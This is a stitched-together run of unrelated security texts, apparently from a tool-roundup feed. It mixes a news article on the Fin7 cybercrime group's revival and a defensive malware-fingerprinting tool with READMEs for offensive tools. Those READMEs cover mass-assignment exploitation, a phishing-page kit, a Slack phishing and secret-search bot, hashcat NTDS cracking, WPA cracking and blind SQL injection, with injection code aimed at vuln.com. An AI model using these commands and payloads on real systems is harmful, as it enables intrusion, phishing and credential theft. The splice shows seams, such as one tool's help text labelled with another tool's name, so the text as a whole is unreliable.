Mass Assigner is a powerful tool designed to identify and exploit mass assignment vulnerabilities in web applications. It achieves this by first retrieving data from a specified request, such as fetching user profile data. Then, it systematically attempts to apply each parameter extracted from the response to a second request provided, one parameter at a time. This approach allows for the automated testing and exploitation of potential mass assignment vulnerabilities.
This tool actively modifies server-side data. Please ensure you have proper authorization before use. Any unauthorized or illegal activity using this tool is entirely at your own risk.
Install requirements
pip3 install -r requirements.txt
Run the script
python3 mass_assigner.py --fetch-from "http://example.com/path-to-fetch-data" --target-req "http://example.com/path-to-probe-the-data"
Forbidden Buster accepts the following arguments:
-h, --help show this help message and exit
--fetch-from FETCH_FROM
URL to fetch data from
--target-req TARGET_REQ
URL to send modified data to
-H HEADER, --header HEADER
Add a custom header. Format: 'Key: Value'
-p PROXY, --proxy PROXY
Use Proxy, Usage i.e: http://127.0.0.1:8080.
-d DATA, --data DATA Add data to the request body. JSON is supported with escaping.
--rate-limit RATE_LIMIT
Number of requests per second
--source-method SOURCE_METHOD
HTTP method for the initial request. Default is GET.
--target-method TARGET_METHOD
HTTP method for the modified request. Default is PUT.
--ignore-params IGNORE_PARAMS
Parameters to ignore during modification, separated by comma.
Example Usage:
python3 mass_assigner.py --fetch-from "http://example.com/api/v1/me" --target-req "http://example.com/api/v1/me" --header "Authorization: Bearer XXX" --proxy "http://proxy.example.com" --data '{\"param1\": \"test\", \"param2\":true}'
The Russia-based cybercrime group dubbed βFin7,β known for phishing and malware attacks that have cost victim organizations an estimated $3 billion in losses since 2013, was declared dead last year by U.S. authorities. But experts say Fin7 has roared back to life in 2024 β setting up thousands of websites mimicking a range of media and technology companies β with the help of Stark Industries Solutions, a sprawling hosting provider that is a persistent source of cyberattacks against enemies of Russia.
In May 2023, the U.S. attorney for Washington state declared βFin7 is an entity no more,β after prosecutors secured convictions and prison sentences against three men found to be high-level Fin7 hackers or managers. This was a bold declaration against a group that the U.S. Department of Justice described as a criminal enterprise with more than 70 people organized into distinct business units and teams.
The first signs of Fin7βs revival came in April 2024, when Blackberry wrote about an intrusion at a large automotive firm that began with malware served by a typosquatting attack targeting people searching for a popular free network scanning tool.
Now, researchers at security firm Silent Push say they have devised a way to map out Fin7βs rapidly regrowing cybercrime infrastructure, which includes more than 4,000 hosts that employ a range of exploits, from typosquatting and booby-trapped ads to malicious browser extensions and spearphishing domains.
Silent Push said it found Fin7 domains targeting or spoofing brands including American Express, Affinity Energy, Airtable, Alliant, Android Developer, Asana, Bitwarden, Bloomberg, Cisco (Webex), CNN, Costco, Dropbox, Grammarly, Google, Goto.com, Harvard, Lexis Nexis, Meta, Microsoft 365, Midjourney, Netflix, Paycor, Quickbooks, Quicken, Reuters, Regions Bank Onepass, RuPay, SAP (Ariba), Trezor, Twitter/X, Wall Street Journal, Westlaw, and Zoom, among others.
Zach Edwards, senior threat analyst at Silent Push, said many of the Fin7 domains are innocuous-looking websites for generic businesses that sometimes include text from default website templates (the content on these sites often has nothing to do with the entityβs stated business or mission).
Edwards said Fin7 does this to βageβ the domains and to give them a positive or at least benign reputation before theyβre eventually converted for use in hosting brand-specific phishing pages.
βIt took them six to nine months to ramp up, but ever since January of this year they have been humming, building a giant phishing infrastructure and aging domains,β Edwards said of the cybercrime group.
In typosquatting attacks, Fin7 registers domains that are similar to those for popular free software tools. Those look-alike domains are then advertised on Google so that sponsored links to them show up prominently in search results, which is usually above the legitimate source of the software in question.
A malicious site spoofing FreeCAD showed up prominently as a sponsored result in Google search results earlier this year.
According to Silent Push, the software currently being targeted by Fin7 includes 7-zip, PuTTY, ProtectedPDFViewer, AIMP, Notepad++, Advanced IP Scanner, AnyDesk, pgAdmin, AutoDesk, Bitwarden, Rest Proxy, Python, Sublime Text, and Node.js.
In May 2024, security firm eSentire warned that Fin7 was spotted using sponsored Google ads to serve pop-ups prompting people to download phony browser extensions that install malware. Malwarebytes blogged about a similar campaign in April, but did not attribute the activity to any particular group.
A pop-up at a Thomson Reuters typosquatting domain telling visitors they need to install a browser extension to view the news content.
Edwards said Silent Push discovered the new Fin7 domains after a hearing from an organization that was targeted by Fin7 in years past and suspected the group was once again active. Searching for hosts that matched Fin7βs known profile revealed just one active site. But Edwards said that one site pointed to many other Fin7 properties at Stark Industries Solutions, a large hosting provider that materialized just two weeks before Russia invaded Ukraine.
As KrebsOnSecurity wrote in May, Stark Industries Solutions is being used as a staging ground for wave after wave of cyberattacks against Ukraine that have been tied to Russian military and intelligence agencies.
βFIN7 rents a large amount of dedicated IP on Stark Industries,β Edwards said. βOur analysts have discovered numerous Stark Industries IPs that are solely dedicated to hosting FIN7 infrastructure.β
Fin7 once famously operated behind fake cybersecurity companies β with names like Combi Security and Bastion Secure β which they used for hiring security experts to aid in ransomware attacks. One of the new Fin7 domains identified by Silent Push is cybercloudsec[.]com, which promises to βgrow your business with our IT, cyber security and cloud solutions.β
The fake Fin7 security firm Cybercloudsec.
Like other phishing groups, Fin7 seizes on current events, and at the moment it is targeting tourists visiting France for the Summer Olympics later this month. Among the new Fin7 domains Silent Push found are several sites phishing people seeking tickets at the Louvre.
βWe believe this research makes it clear that Fin7 is back and scaling up quickly,β Edwards said. βItβs our hope that the law enforcement community takes notice of this and puts Fin7 back on their radar for additional enforcement actions, and that quite a few of our competitors will be able to take this pool and expand into all or a good chunk of their infrastructure.β
Further reading:
Stark Industries Solutions: An Iron Hammer in the Cloud.
A 2022 deep dive on Fin7 from the Swiss threat intelligence firm Prodaft (PDF).
Tool for Fingerprinting HTTP requests of malware. Based on Tshark and written in Python3. Working prototype stage :-)
Its main objective is to provide unique representations (fingerprints) of malware requests, which help in their identification. Unique means here that each fingerprint should be seen only in one particular malware family, yet one family can have multiple fingerprints. Hfinger represents the request in a shorter form than printing the whole request, but still human interpretable.
Hfinger can be used in manual malware analysis but also in sandbox systems or SIEMs. The generated fingerprints are useful for grouping requests, pinpointing requests to particular malware families, identifying different operations of one family, or discovering unknown malicious requests omitted by other security systems but which share fingerprint.
An academic paper accompanies work on this tool, describing, for example, the motivation of design choices, and the evaluation of the tool compared to p0f, FATT, and Mercury.
The basic assumption of this project is that HTTP requests of different malware families are more or less unique, so they can be fingerprinted to provide some sort of identification. Hfinger retains information about the structure and values of some headers to provide means for further analysis. For example, grouping of similar requests - at this moment, it is still a work in progress.
After analysis of malware's HTTP requests and headers, we have identified some parts of requests as being most distinctive. These include: * Request method * Protocol version * Header order * Popular headers' values * Payload length, entropy, and presence of non-ASCII characters
Additionally, some standard features of the request URL were also considered. All these parts were translated into a set of features, described in details here.
The above features are translated into varying length representation, which is the actual fingerprint. Depending on report mode, different features are used to fingerprint requests. More information on these modes is presented below. The feature selection process will be described in the forthcoming academic paper.
Minimum requirements needed before installation: * Python
>= 3.3, * Tshark
>= 2.2.0.
Installation available from PyPI:
pip install hfinger
Hfinger has been tested on Xubuntu 22.04 LTS with tshark
package in version 3.6.2
, but should work with older versions like 2.6.10
on Xubuntu 18.04 or 3.2.3
on Xubuntu 20.04.
Please note that as with any PoC, you should run Hfinger in a separated environment, at least with Python virtual environment. Its setup is not covered here, but you can try this tutorial.
After installation, you can call the tool directly from a command line with hfinger
or as a Python module with python -m hfinger
.
For example:
foo@bar:~$ hfinger -f /tmp/test.pcap
[{"epoch_time": "1614098832.205385000", "ip_src": "127.0.0.1", "ip_dst": "127.0.0.1", "port_src": "53664", "port_dst": "8080", "fingerprint": "2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4"}]
Help can be displayed with short -h
or long --help
switches:
usage: hfinger [-h] (-f FILE | -d DIR) [-o output_path] [-m {0,1,2,3,4}] [-v]
[-l LOGFILE]
Hfinger - fingerprinting malware HTTP requests stored in pcap files
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Read a single pcap file
-d DIR, --directory DIR
Read pcap files from the directory DIR
-o output_path, --output-path output_path
Path to the output directory
-m {0,1,2,3,4}, --mode {0,1,2,3,4}
Fingerprint report mode.
0 - similar number of collisions and fingerprints as mode 2, but using fewer features,
1 - representation of all designed features, but a little more collisions than modes 0, 2, and 4,
2 - optimal (the default mode),
3 - the lowest number of generated fingerprints, but the highest number of collisions,
4 - the highest fingerprint entropy, but slightly more fingerprints than modes 0-2
-v, --verbose Report information about non-standard values in the request
(e.g., non-ASCII characters, no CRLF tags, values not present in the configuration list).
Without --logfile (-l) will print to the standard error.
-l LOGFILE, --logfile LOGFILE
Output logfile in the verbose mode. Implies -v or --verbose switch.
You must provide a path to a pcap file (-f), or a directory (-d) with pcap files. The output is in JSON format. It will be printed to standard output or to the provided directory (-o) using the name of the source file. For example, output of the command:
hfinger -f example.pcap -o /tmp/pcap
will be saved to:
/tmp/pcap/example.pcap.json
Report mode -m
/--mode
can be used to change the default report mode by providing an integer in the range 0-4
. The modes differ on represented request features or rounding modes. The default mode (2
) was chosen by us to represent all features that are usually used during requests' analysis, but it also offers low number of collisions and generated fingerprints. With other modes, you can achieve different goals. For example, in mode 3
you get a lower number of generated fingerprints but a higher chance of a collision between malware families. If you are unsure, you don't have to change anything. More information on report modes is here.
Beginning with version 0.2.1
Hfinger is less verbose. You should use -v
/--verbose
if you want to receive information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n
), and other problems with analyzed requests that are not application errors. When any such issues are encountered in the verbose mode, they will be printed to the standard error output. You can also save the log to a defined location using -l
/--log
switch (it implies -v
/--verbose
). The log data will be appended to the log file.
Beginning with version 0.2.0
, Hfinger supports importing to other Python applications. To use it in your app simply import hfinger_analyze
function from hfinger.analysis
and call it with a path to the pcap file and reporting mode. The returned result is a list of dicts with fingerprinting results.
For example:
from hfinger.analysis import hfinger_analyze
pcap_path = "SPECIFY_PCAP_PATH_HERE"
reporting_mode = 4
print(hfinger_analyze(pcap_path, reporting_mode))
Beginning with version 0.2.1
Hfinger uses logging
module for logging information about encountered non-standard values of headers, non-ASCII characters in the non-payload part of the request, lack of CRLF tags (\r\n\r\n
), and other problems with analyzed requests that are not application errors. Hfinger creates its own logger using name hfinger
, but without prior configuration log information in practice is discarded. If you want to receive this log information, before calling hfinger_analyze
, you should configure hfinger
logger, set log level to logging.INFO
, configure log handler up to your needs, add it to the logger. More information is available in the hfinger_analyze
function docstring.
A fingerprint is based on features extracted from a request. Usage of particular features from the full list depends on the chosen report mode from a predefined list (more information on report modes is here). The figure below represents the creation of an exemplary fingerprint in the default report mode.
Three parts of the request are analyzed to extract information: URI, headers' structure (including method and protocol version), and payload. Particular features of the fingerprint are separated using |
(pipe). The final fingerprint generated for the POST
request from the example is:
2|3|1|php|0.6|PO|1|us-ag,ac,ac-en,ho,co,co-ty,co-le|us-ag:f452d7a9/ac:as-as/ac-en:id/co:Ke-Al/co-ty:te-pl|A|4|1.4
The creation of features is described below in the order of appearance in the fingerprint.
Firstly, URI features are extracted: * URI length represented as a logarithm base 10 of the length, rounded to an integer, (in the example URI is 43 characters long, so log10(43)β2
), * number of directories, (in the example there are 3 directories), * average directory length, represented as a logarithm with base 10 of the actual average length of the directory, rounded to an integer, (in the example there are three directories with total length of 20 characters (6+6+8), so log10(20/3)β1
), * extension of the requested file, but only if it is on a list of known extensions in hfinger/configs/extensions.txt
, * average value length represented as a logarithm with base 10 of the actual average value length, rounded to one decimal point, (in the example two values have the same length of 4 characters, what is obviously equal to 4 characters, and log10(4)β0.6
).
Secondly, header structure features are analyzed: * request method encoded as first two letters of the method (PO
), * protocol version encoded as an integer (1 for version 1.1, 0 for version 1.0, and 9 for version 0.9), * order of the headers, * and popular headers and their values.
To represent order of the headers in the request, each header's name is encoded according to the schema in hfinger/configs/headerslow.json
, for example, User-Agent
header is encoded as us-ag
. Encoded names are separated by ,
. If the header name does not start with an upper case letter (or any of its parts when analyzing compound headers such as Accept-Encoding
), then encoded representation is prefixed with !
. If the header name is not on the list of the known headers, it is hashed using FNV1a hash, and the hash is used as encoding.
When analyzing popular headers, the request is checked if they appear in it. These headers are: * Connection * Accept-Encoding * Content-Encoding * Cache-Control * TE * Accept-Charset * Content-Type * Accept * Accept-Language * User-Agent
When the header is found in the request, its value is checked against a table of typical values to create pairs of header_name_representation:value_representation
. The name of the header is encoded according to the schema in hfinger/configs/headerslow.json
(as presented before), and the value is encoded according to schema stored in hfinger/configs
directory or configs.py
file, depending on the header. In the above example Accept
is encoded as ac
and its value */*
as as-as
(asterisk-asterisk
), giving ac:as-as
. The pairs are inserted into fingerprint in order of appearance in the request and are delimited using /
. If the header value cannot be found in the encoding table, it is hashed using the FNV1a hash.
If the header value is composed of multiple values, they are tokenized to provide a list of values delimited with ,
, for example, Accept: */*, text/*
would give ac:as-as,te-as
. However, at this point of development, if the header value contains a "quality value" tag (q=
), then the whole value is encoded with its FNV1a hash. Finally, values of User-Agent and Accept-Language headers are directly encoded using their FNV1a hashes.
Finally, in the payload features: * presence of non-ASCII characters, represented with the letter N
, and with A
otherwise, * payload's Shannon entropy, rounded to an integer, * and payload length, represented as a logarithm with base 10 of the actual payload length, rounded to one decimal point.
Hfinger
operates in five report modes, which differ in features represented in the fingerprint, thus information extracted from requests. These are (with the number used in the tool configuration): * mode 0
- producing a similar number of collisions and fingerprints as mode 2
, but using fewer features, * mode 1
- representing all designed features, but producing a little more collisions than modes 0
, 2
, and 4
, * mode 2
- optimal (the default mode), representing all features which are usually used during requests' analysis, but also offering a low number of collisions and generated fingerprints, * mode 3
- producing the lowest number of generated fingerprints from all modes, but achieving the highest number of collisions, * mode 4
- offering the highest fingerprint entropy, but also generating slightly more fingerprints than modes 0
-2
.
The modes were chosen in order to optimize Hfinger's capabilities to uniquely identify malware families versus the number of generated fingerprints. Modes 0
, 2
, and 4
offer a similar number of collisions between malware families, however, mode 4
generates a little more fingerprints than the other two. Mode 2
represents more request features than mode 0
with a comparable number of generated fingerprints and collisions. Mode 1
is the only one representing all designed features, but it increases the number of collisions by almost two times comparing to modes 0
, 1
, and 4
. Mode 3
produces at least two times fewer fingerprints than other modes, but it introduces about nine times more collisions. Description of all designed features is here.
The modes consist of features (in the order of appearance in the fingerprint): * mode 0
: * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * order of headers, * popular headers and their values, * payload length represented as a float. * mode 1
: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * variable length represented as an integer, * number of variables, * average value length represented as an integer, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as an integer. * mode 2
: * URI length represented as an integer, * number of directories, * average directory length represented as an integer, * extension of the requested file, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as an integer, * payload length represented as a float. * mode 3
: * URI length represented as an integer, * average directory length represented as an integer, * extension of the requested file, * average value length represented as an integer, * order of headers. * mode 4
: * URI length represented as a float, * number of directories, * average directory length represented as a float, * extension of the requested file, * variable length represented as a float, * average value length represented as a float, * request method, * version of protocol, * order of headers, * popular headers and their values, * presence of non-ASCII characters, * payload entropy represented as a float, * payload length represented as a float.
Thief Raccoon is a tool designed for educational purposes to demonstrate how phishing attacks can be conducted on various operating systems. This tool is intended to raise awareness about cybersecurity threats and help users understand the importance of security measures like 2FA and password management.
```bash git clone https://github.com/davenisc/thief_raccoon.git cd thief_raccoon
```bash apt install python3.11-venv
```bash python -m venv raccoon_venv source raccoon_venv/bin/activate
```bash pip install -r requirements.txt
Usage
```bash python app.py
After running the script, you will be presented with a menu to select the operating system. Enter the number corresponding to the OS you want to simulate.
If you are on the same local network (LAN), open your web browser and navigate to http://127.0.0.1:5000.
If you want to make the phishing page accessible over the internet, use ngrok.
Using ngrok
Download ngrok from ngrok.com and follow the installation instructions for your operating system.
Expose your local server to the internet:
Get the public URL:
After running the above command, ngrok will provide you with a public URL. Share this URL with your test subjects to access the phishing page over the internet.
How to install Ngrok on Linux?
```bash curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok
```bash ngrok config add-authtoken xxxxxxxxx--your-token-xxxxxxxxxxxxxx
Deploy your app online
Put your app online at ephemeral domain Forwarding to your upstream service. For example, if it is listening on port http://localhost:8080, run:
```bash ngrok http http://localhost:5000
Example
```bash python app.py
```bash Select the operating system for phishing: 1. Windows 10 2. Windows 11 3. Windows XP 4. Windows Server 5. Ubuntu 6. Ubuntu Server 7. macOS Enter the number of your choice: 2
Open your browser and go to http://127.0.0.1:5000 or the ngrok public URL.
Disclaimer
This tool is intended for educational purposes only. The author is not responsible for any misuse of this tool. Always obtain explicit permission from the owner of the system before conducting any phishing tests.
License
This project is licensed under the MIT License. See the LICENSE file for details.
ScreenShots
Credits
Developer: @davenisc Web: https://davenisc.com
ROPDump is a tool for analyzing binary executables to identify potential Return-Oriented Programming (ROP) gadgets, as well as detecting potential buffer overflow and memory leak vulnerabilities.
<binary>
: Path to the binary file for analysis.-s, --search SEARCH
: Optional. Search for specific instruction patterns.-f, --functions
: Optional. Print function names and addresses.python3 ropdump.py /path/to/binary
python3 ropdump.py /path/to/binary -s "pop eax"
python3 ropdump.py /path/to/binary -f
A Slack Attack Framework for conducting Red Team and phishing exercises within Slack workspaces.
This tool is intended for Security Professionals only. Do not use this tool against any Slack workspace without explicit permission to test. Use at your own risk.
Thousands of organizations utilize Slack to help their employees communicate, collaborate, and interact. Many of these Slack workspaces install apps or bots that can be used to automate different tasks within Slack. These bots are individually provided permissions that dictate what tasks the bot is permitted to request via the Slack API. To authenticate to the Slack API, each bot is assigned an api token that begins with xoxb or xoxp. More often than not, these tokens are leaked somewhere. When these tokens are exfiltrated during a Red Team exercise, it can be a pain to properly utilize them. Now EvilSlackbot is here to automate and streamline that process. You can use EvilSlackbot to send spoofed Slack messages, phishing links, files, and search for secrets leaked in slack.
In addition to red teaming, EvilSlackbot has also been developed with Slack phishing simulations in mind. To use EvilSlackbot to conduct a Slack phishing exercise, simply create a bot within Slack, give your bot the permissions required for your intended test, and provide EvilSlackbot with a list of emails of employees you would like to test with simulated phishes (Links, files, spoofed messages)
EvilSlackbot requires python3 and Slackclient
pip3 install slackclient
usage: EvilSlackbot.py [-h] -t TOKEN [-sP] [-m] [-s] [-a] [-f FILE] [-e EMAIL]
[-cH CHANNEL] [-eL EMAIL_LIST] [-c] [-o OUTFILE] [-cL]
options:
-h, --help show this help message and exit
Required:
-t TOKEN, --token TOKEN
Slack Oauth token
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc
(Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token
(Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f
and -e,-eL, or -cH)
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL
Email of target
-cH CHANNEL, --channel CHANNEL
Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST
Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks
associated with your provided token.
-o OUTFILE, --outfile OUTFILE
Outfile to store search results
-cL, --channel_list List all public Slack channels
To use this tool, you must provide a xoxb or xoxp token.
Required:
-t TOKEN, --token TOKEN (Slack xoxb/xoxp token)
python3 EvilSlackbot.py -t <token>
Depending on the permissions associated with your token, there are several attacks that EvilSlackbot can conduct. EvilSlackbot will automatically check what permissions your token has and will display them and any attack that you are able to perform with your given token.
Attacks:
-sP, --spoof Spoof a Slack message, customizing your name, icon, etc (Requires -e,-eL, or -cH)
-m, --message Send a message as the bot associated with your token (Requires -e,-eL, or -cH)
-s, --search Search slack for secrets with a keyword
-a, --attach Send a message containing a malicious attachment (Requires -f and -e,-eL, or -cH)
With the correct token permissions, EvilSlackbot allows you to send phishing messages while impersonating the botname and bot photo. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -sP -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -sP -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -sP -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to send phishing messages containing phishing links. What makes this attack different from the Spoofed attack is that this method will send the message as the bot associated with your provided token. You will not be able to choose the name or image of the bot sending your phish. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -m -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -m -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -m -cH <Channel name>
With the correct token permissions, EvilSlackbot allows you to search Slack for secrets via a keyword search. Right now, this attack requires a xoxp token, as xoxb tokens can not be given the proper permissions to keyword search within Slack. Use the -o argument to write the search results to an outfile.
python3 EvilSlackbot.py -t <xoxp token> -s -o <outfile.txt>
With the correct token permissions, EvilSlackbot allows you to send file attachments. The attachment attack requires a path to the file (-f) you wish to send. This attack also requires either the email address (-e) of the target, a list of target emails (-eL), or the name of a Slack channel (-cH). EvilSlackbot will use these arguments to lookup the SlackID of the user associated with the provided emails or channel name. To automate your attack, use a list of emails.
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -e <email address>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -eL <email list>
python3 EvilSlackbot.py -t <xoxb token> -a -f <path to file> -cH <Channel name>
Arguments:
-f FILE, --file FILE Path to file attachment
-e EMAIL, --email EMAIL Email of target
-cH CHANNEL, --channel CHANNEL Target Slack Channel (Do not include #)
-eL EMAIL_LIST, --email_list EMAIL_LIST Path to list of emails separated by newline
-c, --check Lookup and display the permissions and available attacks associated with your provided token.
-o OUTFILE, --outfile OUTFILE Outfile to store search results
-cL, --channel_list List all public Slack channels
With the correct permissions, EvilSlackbot can search for and list all of the public channels within the Slack workspace. This can help with planning where to send channel messages. Use -o to write the list to an outfile.
python3 EvilSlackbot.py -t <xoxb token> -cL
A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.
Β
The bigger the domain is, the better the wordlist will be.
name
and sAMAccountName
name
and sAMAccountName
name
name
name
and descriptions
descriptions
--outputfile
To generate a wordlist from the LDAP of the domain domain.local
you can use this command:
./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
You will get the following output if using the Python version:
You will get the following output if using the Powershell version:
Once you have this wordlist, you should crack your NTDS using hashcat, --loopback
and the rule clem9669_large.rule.
./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback
$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_
usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.
Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP
Credentials:
--no- pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
Pyrit allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phase in a space-time-tradeoff. By using the computational power of Multi-Core CPUs and other platforms through ATI-Stream,Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security-protocols.
WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home- and small-office-use at the cost of making the protocol vulnerable to brute-force-attacks against it's key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous as the protocol allows much of the key derivation to be pre-computed, making simple brute-force-attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication-privacy. The exploration and realization of the technology discussed here motivate as a purpose of their own; this is documented by the open development, strictly sourcecode-based distribution and 'copyleft'-licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, MacOS X and Linux as operation-system and x86-, alpha-, arm-, hppa-, mips-, powerpc-, s390 and sparc-processors.
Attacking WPA/WPA2 by brute-force boils down to to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10.000 PMKs per second is equivalent to hashing 9,8 gigabyte of data with SHA1 in one second.
These are examples of how multiple computational nodes can access a single storage server over various ways provided by Pyrit:
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki-entry if interested in porting Pyrit to new hardware-platform. Contributions or bug reports you should [submit an Issue] (https://github.com/JPaulMora/Pyrit/issues).
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e
flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester
and override the request
method. Also, the method must determine whether the query resolved to True
or False
.
import aiohttp
from hakuin import Requester
class StatusRequester(Requester):
async def request(self, ctx, query):
r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status == 200
class ContentRequester(Requester):
async def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = await aiohttp.get(f'http://vuln.com/', headers=headers)
return 'found' in await r.text()
To start extracting data, use the Extractor
class. It requires a DBMS
object to contruct queries and a Requester
object to inject them. Hakuin currently supports SQLite
, MySQL
, PSQL
(PostgreSQL), and MSSQL
(SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS
interface defined in hakuin/dbms/DBMS.py
.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester):
...
async def main():
# requester: Use this Requester
# dbms: Use this DBMS
# n_tasks: Spawns N tasks that extract column rows in parallel
ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
...
if __name__ == '__main__':
asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests
directory.
Hakuin comes with a simple wrapper tool, hk.py
, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
